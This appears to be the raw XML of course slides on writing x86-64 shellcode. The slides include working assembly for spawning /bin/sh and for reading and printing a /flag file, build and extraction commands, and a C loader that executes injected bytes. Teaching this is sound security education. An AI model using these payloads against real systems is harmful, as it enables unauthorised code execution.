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Tahoma"/>
      <p:regular r:id="rId18"/>
      <p:bold r:id="rId19"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light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  <p:embeddedFont>
      <p:font typeface="Roboto Mono Regula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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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MonoRegular-regular.fntdata"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-bold.fntdata"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoRegular-italic.fntdata"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoRegular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Regula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Tahoma-bold.fntdata"/><Relationship Id="rId1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c717ad3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c717ad3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355bd7e67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355bd7e67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605bf389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605bf389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605bf38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605bf38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355bd7e67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355bd7e67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355bd7e67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355bd7e67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605bf3899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605bf3899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Shellcode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"shell"code?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Usually, the goal of an exploit is to achieve arbitrary command execution.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 typical attack goal is to launch a shell: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execve("/bin/sh", NULL, NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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59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is the syscall number of execve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lea rdi, [rip+binsh]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points the first argument of execve at the /bin/sh string below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rsi, 0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makes the second argument, argv, NULL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rdx, 0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makes the third argument, envp, NULL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triggers the system call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binsh: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a label marking where the /bin/sh string is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.string "/bin/sh"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Thus: "shellcode".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Tangent: DATA in your CODE</a:t>
            </a:r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.string "/bin/sh"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/>
              <a:t>???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intersperse arbitrary data in your shellcode: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.byte 0x48, 0x45, 0x4C, 0x4C, 0x4F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"HELLO"</a:t>
            </a:r>
            <a:b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.string "HELLO"				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"HELLO\0"</a:t>
            </a:r>
            <a:endParaRPr sz="14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Other ways to embed data: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rbx, 0x0068732f6e69622f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move "/bin/sh\0" into rbx</a:t>
            </a:r>
            <a:endParaRPr sz="14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push rbx				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push "/bin/sh\0" onto the stack</a:t>
            </a:r>
            <a:endParaRPr sz="14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rdi, rsp			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point rdi at the stack</a:t>
            </a:r>
            <a:endParaRPr sz="14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Non-shell shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236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Shellcode can have many different goals, other than just dropping a shell.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Specialized for our class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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sendfile(1, open("/flag", NULL), 0, 1000)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rbx, 0x00000067616c662f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push "/flag" filename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push rbx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2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syscall number of open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rdi, rsp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point the first argument at stack (where we have "/flag")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rsi, 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NULL out the second argument (meaning, O_RDONLY)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trigger open("/flag", NULL)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rdi, 1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first argument to sendfile is the file descriptor to output to (stdout)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rsi, rax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second argument is the file descriptor returned by open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rdx, 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third argument is the number of bytes to skip from the input file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r10, 1000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fourth argument is the number of bytes to transfer to the output file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40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syscall number of sendfile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trigger sendfile(1, fd, 0, 1000)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60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syscall number of exit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trigger exit()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Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>rite your shellcode as assembly:</a:t>
            </a:r>
            <a:endParaRPr sz="15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.global _start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_start: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.intel_syntax noprefix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mov rax, 59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is the syscall number of execve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lea rdi, [rip+binsh]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points the first argument of execve at the /bin/sh string below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mov rsi, 0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makes the second argument, argv, NULL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mov rdx, 0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makes the third argument, envp, NULL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syscall	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triggers the system call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binsh:		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a label marking where the /bin/sh string is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.string "/bin/sh"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Then, assemble it!</a:t>
            </a:r>
            <a:endParaRPr sz="15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gcc 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-nostdlib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-static shellcode.s -o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shellcode-elf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is an ELF with your shellcode as its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono Regular"/>
                <a:ea typeface="Roboto Mono Regular"/>
                <a:cs typeface="Roboto Mono Regular"/>
                <a:sym typeface="Roboto Mono Regular"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>. You still need to extract it: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objcopy --dump-section .text=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode-raw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shellcode-elf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The resulting shellcode-raw file contains the raw bytes of your shellcode.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This is what you would inject as part of your exploits.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Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248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ELF from before is very useful for testing your shellcode!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gcc -nostdlib -static shellcode.s -o shellcode-elf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="13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	./shellcode-elf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Magic!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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Shellcode (replicating exotic conditions)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254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need to replicate exotic conditions in ways that are too hard to do as a preamble for your shellcode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>you can build a shellcode loader in C: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page = mmap(0x1337000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, 0, 0);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read(0, page, 0x1000);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((void(*)())page)();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cat shellcode-raw | ./tester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